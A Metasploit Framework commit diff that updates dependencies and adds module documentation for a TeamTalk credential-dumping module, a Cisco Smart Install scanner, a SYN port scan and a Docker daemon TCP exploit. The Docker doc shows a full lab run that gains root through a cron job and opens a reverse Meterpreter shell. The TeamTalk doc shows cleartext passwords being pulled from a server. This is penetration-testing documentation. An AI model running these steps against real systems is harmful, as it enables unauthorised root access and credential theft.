sempervictus
diff --git a/‎.yardopts
Lines changed: 1 addition & 1 deletion b/‎.yardopts
Lines changed: 1 addition & 1 deletion
diff --git a/‎Gemfile.lock
Lines changed: 10 additions & 10 deletions b/‎Gemfile.lock
Lines changed: 10 additions & 10 deletions
diff --git a/‎HACKING
Lines changed: 0 additions & 38 deletions b/‎HACKING
Lines changed: 0 additions & 38 deletions
diff --git a/‎documentation/modules/auxiliary/gather/teamtalk_creds.md
Lines changed: 53 additions & 0 deletions b/‎documentation/modules/auxiliary/gather/teamtalk_creds.md
Lines changed: 53 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md
Lines changed: 30 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md
Lines changed: 30 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/scanner/portscan/syn.md
Lines changed: 59 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/portscan/syn.md
Lines changed: 59 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/linux/http/docker_daemon_tcp.md
Lines changed: 131 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/docker_daemon_tcp.md
Lines changed: 131 additions & 0 deletions
@@ -2,7 +2,7 @@
 --exclude samples/
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
---files CONTRIBUTING.md,COPYING,HACKING,LICENSE
+--files CONTRIBUTING.md,COPYING,LICENSE
 app/**/*.rb
 lib/msf/**/*.rb
 lib/metasploit/**/*.rb
 
@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.16.4)
+    metasploit-framework (4.16.7)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -17,7 +17,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.1)
+      metasploit-payloads (= 1.3.7)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.2.2)
       msgpack
@@ -107,10 +107,10 @@ GEM
     backports (3.8.0)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.0)
+    bindata (2.4.1)
     bit-struct (0.16)
     builder (3.2.3)
-    coderay (1.1.1)
+    coderay (1.1.2)
     diff-lcs (1.3)
     dnsruby (1.60.2)
     docile (1.1.5)
@@ -150,7 +150,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.1)
+    metasploit-payloads (1.3.7)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -168,9 +168,9 @@ GEM
     msgpack (1.1.0)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
-    net-ssh (4.1.0)
-    network_interface (0.0.1)
-    nexpose (6.1.1)
+    net-ssh (4.2.0)
+    network_interface (0.0.2)
+    nexpose (7.0.0)
     nokogiri (1.8.0)
       mini_portile2 (~> 2.2.0)
     octokit (4.7.0)
@@ -220,7 +220,7 @@ GEM
       ffi
     rbnacl-libsodium (1.0.13)
       rbnacl (>= 3.0.1)
-    recog (2.1.12)
+    recog (2.1.15)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.11)
@@ -252,7 +252,7 @@ GEM
     rex-powershell (0.1.72)
       rex-random_identifier
       rex-text
-    rex-random_identifier (0.1.3)
+    rex-random_identifier (0.1.4)
       rex-text
     rex-registry (0.1.3)
     rex-rop_builder (0.1.3)
 
@@ -0,0 +1,53 @@
+## Description
+
+  This module retrieves user credentials from BearWare TeamTalk.
+
+  Valid administrator credentials are required.
+
+  Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges.
+
+
+## Vulnerable Application
+
+  [TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired.
+
+  This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.
+
+  The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5).
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use auxiliary/gather/teamtalk_creds`
+  3. Do: `set rhost <RHOST>`
+  4. Do: `set rport <RPORT>` (default: `10333`)
+  5. Do: `set username <USERNAME>` (default: `admin`)
+  6. Do: `set password <PASSWORD>` (default: `admin`)
+  7. Do: `run`
+  8. You should get credentials
+
+
+## Scenarios
+
+  ```
+  [*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2)
+  [+] 172.16.191.166:10333 - Authenticated successfully
+  [+] 172.16.191.166:10333 - User is an administrator
+  [*] 172.16.191.166:10333 - Found 5 users
+
+  TeamTalk User Credentials
+  =========================
+
+   Username  Password                     Type
+   --------  --------                     ----
+   debbie    1234567890                   1
+   murphy    934txs                       2
+   quinn     ~!@#$%^&*()_+{}|:" <>?;',./  2
+   sparks    password                     2
+   stormy                                 1
+
+  [+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt
+  [*] Auxiliary module execution completed
+  ```
+
@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+  Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786.
+
+## Verification Steps
+
+  1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
+  2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
+  3. Do: ```run```
+  4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
+
+
+## Scenarios
+
+  ```
+msf auxiliary(cisco_smart_install) > run
+
+[*] Scanned  57 of 512 hosts (11% complete)
+[*] Scanned 105 of 512 hosts (20% complete)
+[*] Scanned 157 of 512 hosts (30% complete)
+[*] Scanned 212 of 512 hosts (41% complete)
+[*] Scanned 256 of 512 hosts (50% complete)
+[*] Scanned 310 of 512 hosts (60% complete)
+[*] Scanned 368 of 512 hosts (71% complete)
+[*] Scanned 413 of 512 hosts (80% complete)
+[*] Scanned 466 of 512 hosts (91% complete)
+[+] a.b.c.d:4786   - Fingerprinted the Cisco Smart Install protocol
+[*] Scanned 512 of 512 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,59 @@
+## Description
+  
+This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet 
+that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error. 
+The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default.
+
+## Options
+
+  **PORTS**
+  
+  This is the list of TCP ports to test on each host.
+  Formats like  `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
+  options is to scan `1-10000` ports.
+
+  **TIMEOUT**
+  
+   Maximum time to wait for a response. The default value is 500 milliseconds.
+  
+  **VERBOSE**
+  
+  Gives detailed message about the scan of all the ports. It also shows the
+  ports that were closed.
+
+## Verification Steps
+
+  1. Do: `use auxiliary/scanner/portscan/syn`
+  2. Do: `set RHOSTS [IP]`
+  3. Do: `set PORTS [PORTS]`
+  4. Do: `run`
+  5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such.
+
+## Scenarios
+  
+### Metaspliotable 2
+
+```
+msf > use auxiliary/scanner/portscan/syn
+msf auxiliary(syn) > set RHOSTS 192.168.45.159
+RHOSTS => 192.168.45.159
+msf auxiliary(syn) > set PORTS 1-10000
+PORTS => 1-10000
+msf auxiliary(syn) > run
+[*]  TCP OPEN 192.168.45.159:22
+[*]  TCP OPEN 192.168.45.159:23
+[*]  TCP OPEN 192.168.45.159:111
+[*]  TCP OPEN 192.168.45.159:445
+[*]  TCP OPEN 192.168.45.159:512
+[*]  TCP OPEN 192.168.45.159:513
+[*]  TCP OPEN 192.168.45.159:1099
+[*]  TCP OPEN 192.168.45.159:2121
+[*]  TCP OPEN 192.168.45.159:3306
+[*]  TCP OPEN 192.168.45.159:3632
+[*]  TCP OPEN 192.168.45.159:6000
+[*]  TCP OPEN 192.168.45.159:6697
+[*]  TCP OPEN 192.168.45.159:8009
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,131 @@
+# Vulnerable Application
+Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
+with tls but without tls-auth), an attacker can create a Docker
+container with the '/' path mounted with read/write permissions on the
+host server that is running the Docker container. As the Docker 
+container executes command as uid 0 it is honored by the host operating
+system allowing the attacker to edit/create files owned by root. This
+exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
+the host server.
+
+The Docker image should exist on the target system or be a valid image
+from hub.docker.com.
+
+## Docker Engine
+By default, Docker runs via a non-networked unix socket. It can also
+optionally communicate using a tcp socket.
+
+> Warning: Changing the default docker daemon binding to a TCP port or
+Unix docker user group will increase your security risks by allowing
+non-root users to gain root access on the host. Make sure you control
+access to docker. If you are binding to a TCP port, anyone with access
+to that port has full Docker access; so it is not advisable on an open
+network. -- [from docs.docker.com][1]
+
+This module was tested with Debian 9 and CentOS 7 as the host operating
+system and with Docker CE 17.06.0-ce and Docker Engine 1.13.1.
+
+### Install Debian 9
+First [install Debian 9][2] with default task selection. This includes
+the "*standard system utilities*".
+
+### Install Docker
+Then install a supported version of [Docker on Debian system][3].
+
+```bash
+# TL;DR
+apt-get remove docker docker-engine
+apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common
+curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
+apt-key fingerprint 0EBFCD88
+# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88.
+add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
+apt-get update
+apt-get install docker-ce
+docker run hello-world
+```
+
+### Activate unprotected tcp socket
+Once Docker is installed, customize the Docker daemon options and add
+the tcp socket `-H tcp://0.0.0.0:2375` option. On Debian override the
+settings from `/lib/systemd/system/docker.service` with a new file
+`/etc/systemd/system/docker.service`.
+
+Further information: [docker systemd][4] and [docker daemon options][5]. 
+
+```bash
+# TL;DR
+echo "[Service]
+ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375" | tee /etc/systemd/system/docker.service
+systemctl daemon-reload
+systemctl restart docker
+curl http://127.0.0.1:2375/_ping ; echo
+OK
+```
+
+### Mitigation
+
+[Disable][5] or [protect][6] the Docker tcp socket.
+
+# Exploitation
+This module is designed for the attacker to leverage, creation of a
+Docker container with out authentication through the Docker tcp socket
+to gain root access to the hosting server of the Docker container.
+
+## Options
+- DOCKERIMAGE is the locally or from hub.docker.com available image you are wanting to have Docker to deploy for this exploit.
+- CONTAINER_ID if you want to have a human readable name for your container, else it will be randomly generated
+
+## Steps to exploit with module
+- [ ] Start msfconsole
+- [ ] use exploit/linux/http/docker_daemon_tcp
+- [ ] Set the options appropriately and set VERBOSE to true
+- [ ] Verify it creates a Docker container and it successfully runs
+- [ ] After a minute a session should be opened from the Docker server
+
+## Example Output
+```
+msf > use exploit/linux/http/docker_daemon_tcp
+msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23
+RHOST => 192.168.66.23
+msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp
+PAYLOAD => python/meterpreter/reverse_tcp
+msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10
+LHOST => 192.168.66.10
+msf exploit(docker_daemon_tcp) > set VERBOSE true
+VERBOSE => true
+msf exploit(docker_daemon_tcp) > check
+[+] 192.168.66.23:2375 The target is vulnerable.
+msf exploit(docker_daemon_tcp) > run
+
+[*] Started reverse TCP handler on 192.168.66.10:4444
+[*] Check if images exist on the target host
+[*] Image is not available on the target host
+[*] Trying to pulling image from docker registry, this may take a while
+[*] Setting container json request variables
+[*] Creating the docker container command
+[*] The docker container is created, waiting for deploy
+[*] Waiting for the cron job to run, can take up to 60 seconds
+[*] Waiting until the docker container stopped
+[*] The docker container has been stopped, now trying to remove it
+[*] Sending stage (40411 bytes) to 192.168.66.23
+[*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200
+[+] Deleted /etc/cron.d/lVoepNpy
+[+] Deleted /tmp/poasDIuZ
+
+
+meterpreter > sysinfo
+Computer        : debian
+OS              : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter >
+```
+
+[1]:https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket
+[2]:https://www.debian.org/releases/stretch/amd64/index.html.en
+[3]:https://docs.docker.com/engine/installation/linux/docker-ce/debian/
+[4]:https://docs.docker.com/engine/admin/systemd/
+[5]:https://docs.docker.com/engine/reference/commandline/dockerd/#options
+[6]:https://docs.docker.com/engine/security/https/